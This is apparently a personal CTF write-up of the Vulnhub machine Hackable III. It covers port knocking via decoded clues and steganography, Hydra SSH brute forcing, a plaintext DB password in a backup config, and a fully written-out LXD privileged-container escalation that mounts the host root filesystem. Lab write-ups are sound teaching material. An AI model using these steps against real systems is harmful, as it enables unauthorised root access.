There has been nothing good on THM for a little while now, so I’m working back through some older Vulnhub machines. Not that this is particularly old, but whatever. I had looz in my list so I thought I might do that; once I booted it up I remembered that I already had finished the box but hadn’t bothered writing it up. Ooof. Oh and I’ve also done doubletrouble but haven’t written it up.
Anyway this was HACKABLE: III .
Let’s Go
HTTP only. Let’s start pokin’ around. A comment in the page source on the webroot says:
Please, jubiscleudo, don’t forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com
So…sounds like port knocking. Robots.txt disallows /config , which contains 1.txt, which contains: MTAwMDA=, which is 10000 in base64. That’s our first port.
We find port 2 here: http://192.168.1.100/css/2.txt . This contains some brainfuck, which decodes to 4444; that’s our second port.
Viewing the source for http://192.168.1.100/login.php gives us:
<?php
include ( 'config.php' );
$usuario = $_POST [ 'user' ];
$senha = $_POST [ 'pass' ];
$query = " SELECT * FROM usuarios WHERE user = ' { $usuario } ' and pass = ' { $senha } '" ;
$result = mysqli_query ( $conexao , $query );
$row = mysqli_num_rows ( $result );
#validação conta
if ( $row == 1 ) {
$_SESSION [ 'usuario' ] = $usuario ;
header ( 'Location: 3.jpg' );
exit ();
} else {
$_SESSION [ 'nao_autenticado' ] = true ;
header ( 'Location: login_page/login.html' );
exit ();
}
?>
So, if we go get 3.jpg we can run stegseek on it…
┌──( root💀kali) -[/opt/vulnhub/hackable3]
└─# stegseek 3.jpg
StegSeek version 0.5
Progress: 0.00% ( 0 bytes)
[ i] -- > Found passphrase: ""
[ i] Original filename: "steganopayload148505.txt"
[ i] Extracting to "3.jpg.out"
┌──( root💀kali) -[/opt/vulnhub/hackable3]
└─# cat 3.jpg.out
porta:65535
And there’s our third port. Note you don’t have to use three ports for port knocking, but it’s common in CTFs.
Let’s see if it works:
knock 192.168.1.100 10000 4444 65535
Re-run the port scan, and bingo we have SSH open.
SSH
We already had two potential usernames:
jubiscleudo, and
dev_suport
And in the course of our fuzzing the webserver, we turned up http://192.168.1.100/backup/wordlist.txt which has 300 entries. I run it first with dev_suport with Hydra; no dice. But it’s bingo with jubiscleudo .
Once we get on, we have one other main user: hackable_3 . We can find his password in /var/www/html/.backup_config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define ( 'DB_SERVER' , 'localhost' );
define ( 'DB_USERNAME' , 'hackable_3' );
define ( 'DB_PASSWORD' , 'TrOLLED_3' );
define ( 'DB_NAME' , 'hackable' );
/* Attempt to connect to MySQL database */
$conexao = mysqli_connect ( DB_SERVER , DB_USERNAME , DB_PASSWORD , DB_NAME );
// Check connection
if ( $conexao === false ){
die ( "ERROR: Could not connect. " . mysqli_connect_error ());
} else {
}
?>
There is no mysql on the box, but TrOLLED_3 works for hackable_3. hackable_3 is in the lxd group, so that’s it:
hackable_3@ubuntu20:~$ wget http://192.168.1.210:9090/alpine-v3.14-x86_64-20210910_2324.tar.gz
--2021-09-17 12:12:38-- http://192.168.1.210:9090/alpine-v3.14-x86_64-20210910_2324.tar.gz
Connecting to 192.168.1.210:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3253157 ( 3.1M) [ application/x-tar]
Saving to: ‘alpine-v3.14-x86_64-20210910_2324.tar.gz’
alpine-v3.14-x86_64-20210910_2324.tar.gz 100%[================================================================================================================>] 3.10M -- .-KB/s in 0.02s
2021-09-17 12:12:38 ( 172 MB/s) - ‘alpine-v3.14-x86_64-20210910_2324.tar.gz’ saved [ 3253157/3253157]
hackable_3@ubuntu20:~$ lxc image list
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04
+-------+-------------+--------+-------------+--------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+--------------+------+------+-------------+
hackable_3@ubuntu20:~$ lxd init
Would you like to use LXD clustering? ( yes /no) [ default = no]:
Do you want to configure a new storage pool? ( yes /no) [ default = yes ] :
Name of the new storage pool [ default = default]:
Name of the storage backend to use ( lvm, zfs, ceph, btrfs, dir ) [ default = zfs]:
Create a new ZFS pool? ( yes /no) [ default = yes ] :
Would you like to use an existing empty block device ( e.g. a disk or partition) ? ( yes /no) [ default = no]:
Size in GB of the new loop device ( 1GB minimum) [ default = 5GB]:
Would you like to connect to a MAAS server? ( yes /no) [ default = no]:
Would you like to create a new local network bridge? ( yes /no) [ default = yes ] :
What should the new bridge be called? [ default = lxdbr0]:
What IPv4 address should be used? ( CIDR subnet notation, “auto” or “none”) [ default = auto]:
What IPv6 address should be used? ( CIDR subnet notation, “auto” or “none”) [ default = auto]:
Would you like the LXD server to be available over the network? ( yes /no) [ default = no]:
Would you like stale cached images to be updated automatically? ( yes /no) [ default = yes ]
Would you like a YAML "lxd init" preseed to be printed? ( yes /no) [ default = no]:
hackable_3@ubuntu20:~$ lxc image import alpine-v3.14-x86_64-20210910_2324.tar.gz --alias alpine
Image imported with fingerprint: 1b9b6768ec27c8c3e20e09ccd8c1f3bc6a4a9e55b0a858926545c4ad3c88562b
hackable_3@ubuntu20:~$ lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| alpine | 1b9b6768ec27 | no | alpine v3.14 ( 20210910_23:24) | x86_64 | CONTAINER | 3.10MB | Sep 17, 2021 at 12:13pm ( UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
hackable_3@ubuntu20:~$ lxc init alpine privesc -c security.privileged= true
Creating privesc
hackable_3@ubuntu20:~$ lxc config device add privesc host-root disk source = / path = /mnt/root recursive = true
Device host-root added to privesc
hackable_3@ubuntu20:~$ lxc start privesc
hackable_3@ubuntu20:~$ lxc exec privesc /bin/sh
~ # cd /mnt/root/root
/mnt/root/root # ls -lash
total 48K
4 drwx------ 6 root root 4.0K Jun 29 19:44 .
4 drwxr-xr-x 21 root root 4.0K Apr 29 16:32 ..
0 -rw------- 1 root root 0 Jun 30 20:46 .bash_history
4 -rw-r--r-- 1 root root 3.0K Aug 14 2019 .bashrc
4 drwx------ 2 root root 4.0K Apr 29 16:11 .cache
4 -rw------- 1 root root 28 Jun 29 19:44 .lesshst
4 drwxr-xr-x 3 root root 4.0K Apr 29 16:28 .local
4 -rw-r--r-- 1 root root 161 Sep 16 2020 .profile
4 -rw-r--r-- 1 root root 66 Apr 29 16:37 .selected_editor
4 drwx------ 2 root root 4.0K Apr 27 15:07 .ssh
4 -rwxr-xr-x 1 root root 46 Jun 28 23:21 knockrestart.sh
4 -rw------- 1 root root 2.7K Jun 28 23:41 root.txt
4 drwxr-xr-x 3 root root 4.0K Apr 27 15:07 snap
/mnt/root/root # cat root.txt
░░█▀░░░░░░░░░░░▀▀███████░░░░
░░█▌░░░░░░░░░░░░░░░▀██████░░░
░█▌░░░░░░░░░░░░░░░░███████▌░░
░█░░░░░░░░░░░░░░░░░████████░░
▐▌░░░░░░░░░░░░░░░░░▀██████▌░░
░▌▄███▌░░░░▀████▄░░░░▀████▌░░
▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░
▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌
▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌
▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌
░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░
░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░
░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░
░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░
░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░
░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░
░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░
░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░
░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░
▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░
░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄
░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░
░░▄▌████████▄▄▄███████▌░░░░░▄
░▄▀░██████████████████▌▀▄░░░░
▀░░░█████▀▀░░░▀███████░░░▀▄░░
░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░
░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀
░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░
░╔╗║░╔═╗░═╦═░░░░░╔╗░░╔═╗░╦═╗░
░║║║░║░║░░║░░░░░░╠╩╗░╠═╣░║░║░
░║╚╝░╚═╝░░║░░░░░░╚═╝░║░║░╩═╝░
invite-me: linkedin.com/in/eliastouguinho
/mnt/root/root #